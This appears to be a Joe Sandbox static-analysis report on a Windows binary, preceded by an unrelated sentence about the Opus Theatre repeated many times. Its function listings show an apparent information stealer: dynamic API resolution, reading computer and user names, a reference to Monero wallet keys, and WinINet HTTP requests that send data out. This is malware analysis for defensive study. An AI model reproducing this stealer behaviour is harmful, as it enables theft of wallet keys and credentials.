Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: df2fd8e7f87cacc7689b508c118c8e77ce00d1c3ad28ef9c498167c80b42a0c7
                              • Instruction ID: 9d240672b01a6e5116818a5bffa9969485fd493c23c027aec6278e1e946a0ef3
                              • Opcode Fuzzy Hash: df2fd8e7f87cacc7689b508c118c8e77ce00d1c3ad28ef9c498167c80b42a0c7
                              • Instruction Fuzzy Hash: 7D414B606C261C7AFE39F7A58842EBD77B2BFC2709F5090E4F80853282CBF275414526
                              Function 00C54880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 801 c54880-c54942 call c6a7a0 call c547b0 call c6a740 * 5 InternetOpenA StrCmpCA 816 c54944 801->816 817 c5494b-c5494f 801->817 816->817 818 c54955-c54acd call c68b60 call c6a920 call c6a8a0 call c6a800 * 2 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a920 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a920 call c6a8a0 call c6a800 * 2 InternetConnectA 817->818 819 c54ecb-c54ef3 InternetCloseHandle call c6aad0 call c59ac0 817->819 818->819 905 c54ad3-c54ad7 818->905 829 c54ef5-c54f2d call c6a820 call c6a9b0 call c6a8a0 call c6a800 819->829 830 c54f32-c54fa2 call c68990 * 2 call c6a7a0 call c6a800 * 8 819->830 829->830 906 c54ae5 905->906 907 c54ad9-c54ae3 905->907 908 c54aef-c54b22 HttpOpenRequestA 906->908 907->908 909 c54ebe-c54ec5 InternetCloseHandle 908->909 910 c54b28-c54e28 call c6a9b0 call c6a8a0 call c6a800 call c6a920 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a920 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a920 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a9b0 call c6a8a0 call c6a800 call c6a920 call c6a8a0 call c6a800 call c6a740 call c6a920 * 2 call c6a8a0 call c6a800 * 2 call c6aad0 lstrlen call c6aad0 * 2 lstrlen call c6aad0 HttpSendRequestA 908->910 909->819 1021 c54e32-c54e5c InternetReadFile 910->1021 1022 c54e67-c54eb9 InternetCloseHandle call c6a800 1021->1022 1023 c54e5e-c54e65 1021->1023 1022->909 1023->1022 1024 c54e69-c54ea7 call c6a9b0 call c6a8a0 call c6a800 1023->1024 1024->1021
                              APIs
                                • Part of subcall function 00C6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C6A7E6
                                • Part of subcall function 00C547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C54839
                                • Part of subcall function 00C547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C54849
                                • Part of subcall function 00C6A740: lstrcpy.KERNEL32(00C70E17,00000000), ref: 00C6A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00C54915
                              • StrCmpCA.SHLWAPI(?,007FE758), ref: 00C5493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C54ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C70DDB,00000000,?,?,00000000,?,",00000000,?,007FE898), ref: 00C54DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00C54E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00C54E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C54E49
                              • InternetCloseHandle.WININET(00000000), ref: 00C54EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00C54EC5
                              • HttpOpenRequestA.WININET(00000000,007FE828,?,007FE338,00000000,00000000,00400100,00000000), ref: 00C54B15
                                • Part of subcall function 00C6A9B0: lstrlen.KERNEL32(?,007F90E8,?,\Monero\wallet.keys,00C70E17), ref: 00C6A9C5
                                • Part of subcall function 00C6A9B0: lstrcpy.KERNEL32(00000000), ref: 00C6AA04
                                • Part of subcall function 00C6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C6AA12
                                • Part of subcall function 00C6A8A0: lstrcpy.KERNEL32(?,00C70E17), ref: 00C6A905
                                • Part of subcall function 00C6A920: lstrcpy.KERNEL32(00000000,?), ref: 00C6A972
                                • Part of subcall function 00C6A920: lstrcat.KERNEL32(00000000), ref: 00C6A982
                              • InternetCloseHandle.WININET(00000000), ref: 00C54ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: 76293846af8661fd5ee7e5a76d99b65456cb9f5c355be0394e7f7f482dd7593b
                              • Instruction ID: dc07f7cae33fd2cc57c75b2e5d1627d453e2def008be2ac7c1a225cb633578fb
                              • Opcode Fuzzy Hash: 76293846af8661fd5ee7e5a76d99b65456cb9f5c355be0394e7f7f482dd7593b
                              • Instruction Fuzzy Hash: 6F12CB71910218AADB25EB91DDD2FEEB378AF18300F5441A9B50673091EF702F89DF66
                              Function 00C678E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C67910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C67917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00C6792F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 78efa7f2e0a7b50c1a10a7db041e80dca8ac5d580b4164e792c76d067d588e44
                              • Instruction ID: 66e68c1265925164d9d43159cb4e41e6715519848217f85cdf216ce1a1737471
                              • Opcode Fuzzy Hash: 78efa7f2e0a7b50c1a10a7db041e80dca8ac5d580b4164e792c76d067d588e44
                              • Instruction Fuzzy Hash: F00186B1A04204EFD724DF95DD49BAEBBF8FB04B25F10466AF545E3280C37459048BA1
                              Function 00C67850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C511B7), ref: 00C67880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C67887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C6789F
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 1a7266236f372f6304a17593e78b9b982e483920d2d6b6b697f0fd923bde585f
                              • Instruction ID: 73d7b712742a023ecf6af6c35c2a58a38a15e467c3e2b5e66cf4ab0f8ee3893d
                              • Opcode Fuzzy Hash: 1a7266236f372f6304a17593e78b9b982e483920d2d6b6b697f0fd923bde585f
                              • Instruction Fuzzy Hash: 18F04FB1D44208AFC714DF99DD4AFAEBBB8EB08711F10066BFA05A3680C77419048BE1
                              Function 00C51160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: 35c75b27a045d767cdf6b1ded2a44ee83802386cedaa6d410fcf876fe6980fea
                              • Instruction ID: baefd72a918b43fec5880499f5d905164509fb3c1ed32009ad63f4d65a45826f
                              • Opcode Fuzzy Hash: 35c75b27a045d767cdf6b1ded2a44ee83802386cedaa6d410fcf876fe6980fea
                              • Instruction Fuzzy Hash: 6BD067749042089BCB049BE1994A6EDBB78EB08616F1415A6DD0572240EA31599A8AA6
                              Function 00C69C10 Relevance: 226.4, APIs: 112, Strings: 17, Instructions: 684libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 c69c10-c69c1a 634 c6a036-c6a0ca LoadLibraryA * 8 633->634 635 c69c20-c6a031 GetProcAddress * 43 633->635 636 c6a146-c6a14d 634->636 637 c6a0cc-c6a141 GetProcAddress * 5 634->637 635->634 638 c6a216-c6a21d 636->638 639 c6a153-c6a211 GetProcAddress * 8 636->639 637->636 640 c6a21f-c6a293 GetProcAddress * 5 638->640 641 c6a298-c6a29f 638->641 639->638 640->641 642 c6a337-c6a33e 641->642 643 c6a2a5-c6a332 GetProcAddress * 6 641->643 644 c6a344-c6a41a GetProcAddress * 9 642->644 645 c6a41f-c6a426 642->645 643->642 644->645 646 c6a4a2-c6a4a9 645->646 647 c6a428-c6a49d GetProcAddress * 5 645->647 648 c6a4dc-c6a4e3 646->648 649 c6a4ab-c6a4d7 GetProcAddress * 2 646->649 647->646 650 c6a515-c6a51c 648->650 651 c6a4e5-c6a510 GetProcAddress * 2 648->651 649->648 652 c6a612-c6a619 650->652 653 c6a522-c6a60d GetProcAddress * 10 650->653 651->650 654 c6a67d-c6a684 652->654 655 c6a61b-c6a678 GetProcAddress * 4 652->655 653->652 656 c6a686-c6a699 GetProcAddress 654->656 657 c6a69e-c6a6a5 654->657 655->654 656->657 658 c6a6a7-c6a703 GetProcAddress * 4 657->658 659 c6a708-c6a709 657->659 658->659
                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,007E5B70), ref: 00C69C2D
                              • GetProcAddress.KERNEL32(74DD0000,007E5E30), ref: 00C69C45
                              • GetProcAddress.KERNEL32(74DD0000,007F9670), ref: 00C69C5E
                              • GetProcAddress.KERNEL32(74DD0000,007F96D0), ref: 00C69C76
                              • GetProcAddress.KERNEL32(74DD0000,007F9628), ref: 00C69C8E
                              • GetProcAddress.KERNEL32(74DD0000,007F9610), ref: 00C69CA7
                              • GetProcAddress.KERNEL32(74DD0000,007EB6A8), ref: 00C69CBF
                              • GetProcAddress.KERNEL32(74DD0000,007FCFD8), ref: 00C69CD7
                              • GetProcAddress.KERNEL32(74DD0000,007FCE10), ref: 00C69CF0
                              • GetProcAddress.KERNEL32(74DD0000,007FCFA8), ref: 00C69D08
                              • GetProcAddress.KERNEL32(74DD0000,007FCF48), ref: 00C69D20
                              • GetProcAddress.KERNEL32(74DD0000,007E5E50), ref: 00C69D39
                              • GetProcAddress.KERNEL32(74DD0000,007E5BB0), ref: 00C69D51
                              • GetProcAddress.KERNEL32(74DD0000,007E5C90), ref: 00C69D69
                              • GetProcAddress.KERNEL32(74DD0000,007E5B10), ref: 00C69D82
                              • GetProcAddress.KERNEL32(74DD0000,007FD098), ref: 00C69D9A
                              • GetProcAddress.KERNEL32(74DD0000,007FCFC0), ref: 00C69DB2
                              • GetProcAddress.KERNEL32(74DD0000,007EB978), ref: 00C69DCB
                              • GetProcAddress.KERNEL32(74DD0000,007E5B90), ref: 00C69DE3
                              • GetProcAddress.KERNEL32(74DD0000,007FCEE8), ref: 00C69DFB
                              • GetProcAddress.KERNEL32(74DD0000,007FCFF0), ref: 00C69E14
                              • GetProcAddress.KERNEL32(74DD0000,007FCED0), ref: 00C69E2C
                              • GetProcAddress.KERNEL32(74DD0000,007FCE28), ref: 00C69E44
                              • GetProcAddress.KERNEL32(74DD0000,007E5BD0), ref: 00C69E5D
                              • GetProcAddress.KERNEL32(74DD0000,007FCE40), ref: 00C69E75
                              • GetProcAddress.KERNEL32(74DD0000,007FCF00), ref: 00C69E8D
                              • GetProcAddress.KERNEL32(74DD0000,007FD008), ref: 00C69EA6
                              • GetProcAddress.KERNEL32(74DD0000,007FCE58), ref: 00C69EBE
                              • GetProcAddress.KERNEL32(74DD0000,007FD050), ref: 00C69ED6
                              • GetProcAddress.KERNEL32(74DD0000,007FD0B0), ref: 00C69EEF
                              • GetProcAddress.KERNEL32(74DD0000,007FCF18), ref: 00C69F07
                              • GetProcAddress.KERNEL32(74DD0000,007FCEA0), ref: 00C69F1F
                              • GetProcAddress.KERNEL32(74DD0000,007FD080), ref: 00C69F38
                              • GetProcAddress.KERNEL32(74DD0000,007FA360), ref: 00C69F50
                              • GetProcAddress.KERNEL32(74DD0000,007FCF60), ref: 00C69F68
                              • GetProcAddress.KERNEL32(74DD0000,007FD0C8), ref: 00C69F81
                              • GetProcAddress.KERNEL32(74DD0000,007E5CF0), ref: 00C69F99
                              • GetProcAddress.KERNEL32(74DD0000,007FCF30), ref: 00C69FB1
                              • GetProcAddress.KERNEL32(74DD0000,007E57F0), ref: 00C69FCA
                              • GetProcAddress.KERNEL32(74DD0000,007FD0E0), ref: 00C69FE2
                              • GetProcAddress.KERNEL32(74DD0000,007FCF78), ref: 00C69FFA
                              • GetProcAddress.KERNEL32(74DD0000,007E5810), ref: 00C6A013
                              • GetProcAddress.KERNEL32(74DD0000,007E58D0), ref: 00C6A02B
                              • LoadLibraryA.KERNEL32(007FD020,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A03D
                              • LoadLibraryA.KERNEL32(007FCE70,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A04E
                              • LoadLibraryA.KERNEL32(007FCDF8,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A060
                              • LoadLibraryA.KERNEL32(007FD038,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A072
                              • LoadLibraryA.KERNEL32(007FCE88,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A083
                              • LoadLibraryA.KERNEL32(007FCEB8,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A095
                              • LoadLibraryA.KERNEL32(007FCF90,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A0A7
                              • LoadLibraryA.KERNEL32(007FD068,?,00C65CA3,00C70AEB,?,?,?,?,?,?,?,?,?,?,00C70AEA,00C70AE3), ref: 00C6A0B8
                              • GetProcAddress.KERNEL32(75290000,007E5830), ref: 00C6A0DA
                              • GetProcAddress.KERNEL32(75290000,007FD368), ref: 00C6A0F2
                              • GetProcAddress.KERNEL32(75290000,007F9228), ref: 00C6A10A
                              • GetProcAddress.KERNEL32(75290000,007FD380), ref: 00C6A123
                              • GetProcAddress.KERNEL32(75290000,007E5710), ref: 00C6A13B
                              • GetProcAddress.KERNEL32(73440000,007EB6F8), ref: 00C6A160
                              • GetProcAddress.KERNEL32(73440000,007E5850), ref: 00C6A179
                              • GetProcAddress.KERNEL32(73440000,007EB720), ref: 00C6A191
                              • GetProcAddress.KERNEL32(73440000,007FD218), ref: 00C6A1A9
                              • GetProcAddress.KERNEL32(73440000,007FD200), ref: 00C6A1C2
                              • GetProcAddress.KERNEL32(73440000,007E5730), ref: 00C6A1DA
                              • GetProcAddress.KERNEL32(73440000,007E5990), ref: 00C6A1F2
                              • GetProcAddress.KERNEL32(73440000,007FD260), ref: 00C6A20B
                              • GetProcAddress.KERNEL32(752C0000,007E5910), ref: 00C6A22C
                              • GetProcAddress.KERNEL32(752C0000,007E5930), ref: 00C6A244
                              • GetProcAddress.KERNEL32(752C0000,007FD398), ref: 00C6A25D
                              • GetProcAddress.KERNEL32(752C0000,007FD0F8), ref: 00C6A275
                              • GetProcAddress.KERNEL32(752C0000,007E5750), ref: 00C6A28D
                              • GetProcAddress.KERNEL32(74EC0000,007EBA90), ref: 00C6A2B3
                              • GetProcAddress.KERNEL32(74EC0000,007EBAB8), ref: 00C6A2CB
                              • GetProcAddress.KERNEL32(74EC0000,007FD320), ref: 00C6A2E3
                              • GetProcAddress.KERNEL32(74EC0000,007E59D0), ref: 00C6A2FC
                              • GetProcAddress.KERNEL32(74EC0000,007E5870), ref: 00C6A314
                              • GetProcAddress.KERNEL32(74EC0000,007EB7C0), ref: 00C6A32C
                              • GetProcAddress.KERNEL32(75BD0000,007FD1D0), ref: 00C6A352
                              • GetProcAddress.KERNEL32(75BD0000,007E5890), ref: 00C6A36A
                              • GetProcAddress.KERNEL32(75BD0000,007F9138), ref: 00C6A382
                              • GetProcAddress.KERNEL32(75BD0000,007FD338), ref: 00C6A39B
                              • GetProcAddress.KERNEL32(75BD0000,007FD3E0), ref: 00C6A3B3
                              • GetProcAddress.KERNEL32(75BD0000,007E57D0), ref: 00C6A3CB
                              • GetProcAddress.KERNEL32(75BD0000,007E59B0), ref: 00C6A3E4
                              • GetProcAddress.KERNEL32(75BD0000,007FD230), ref: 00C6A3FC
                              • GetProcAddress.KERNEL32(75BD0000,007FD2A8), ref: 00C6A414
                              • GetProcAddress.KERNEL32(75A70000,007E59F0), ref: 00C6A436
                              • GetProcAddress.KERNEL32(75A70000,007FD2D8), ref: 00C6A44E
                              • GetProcAddress.KERNEL32(75A70000,007FD248), ref: 00C6A466
                              • GetProcAddress.KERNEL32(75A70000,007FD110), ref: 00C6A47F
                              • GetProcAddress.KERNEL32(75A70000,007FD290), ref: 00C6A497
                              • GetProcAddress.KERNEL32(75450000,007E58B0), ref: 00C6A4B8
                              • GetProcAddress.KERNEL32(75450000,007E5770), ref: 00C6A4D1
                              • GetProcAddress.KERNEL32(75DA0000,007E58F0), ref: 00C6A4F2
                              • GetProcAddress.KERNEL32(75DA0000,007FD128), ref: 00C6A50A
                              • GetProcAddress.KERNEL32(6F070000,007E56B0), ref: 00C6A530
                              • GetProcAddress.KERNEL32(6F070000,007E5950), ref: 00C6A548
                              • GetProcAddress.KERNEL32(6F070000,007E5A10), ref: 00C6A560
                              • GetProcAddress.KERNEL32(6F070000,007FD188), ref: 00C6A579
                              • GetProcAddress.KERNEL32(6F070000,007E5970), ref: 00C6A591
                              • GetProcAddress.KERNEL32(6F070000,007E5A30), ref: 00C6A5A9
                              • GetProcAddress.KERNEL32(6F070000,007E57B0), ref: 00C6A5C2
                              • GetProcAddress.KERNEL32(6F070000,007E5790), ref: 00C6A5DA
                              • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00C6A5F1
                              • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00C6A607
                              • GetProcAddress.KERNEL32(75AF0000,007FD140), ref: 00C6A629
                              • GetProcAddress.KERNEL32(75AF0000,007F9268), ref: 00C6A641
                              • GetProcAddress.KERNEL32(75AF0000,007FD350), ref: 00C6A659
                              • GetProcAddress.KERNEL32(75AF0000,007FD308), ref: 00C6A672
                              • GetProcAddress.KERNEL32(75D90000,007E5A50), ref: 00C6A693
                              • GetProcAddress.KERNEL32(6F9D0000,007FD3B0), ref: 00C6A6B4
                              • GetProcAddress.KERNEL32(6F9D0000,007E5A70), ref: 00C6A6CD
                              • GetProcAddress.KERNEL32(6F9D0000,007FD278), ref: 00C6A6E5
                              • GetProcAddress.KERNEL32(6F9D0000,007FD2C0), ref: 00C6A6FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: 0W~$0X~$0Y~$0Z~$0^~$HttpQueryInfoA$InternetSetOptionA$PW~$PX~$PY~$PZ~$P^~$pW~$pX~$pY~$pZ~$p[~
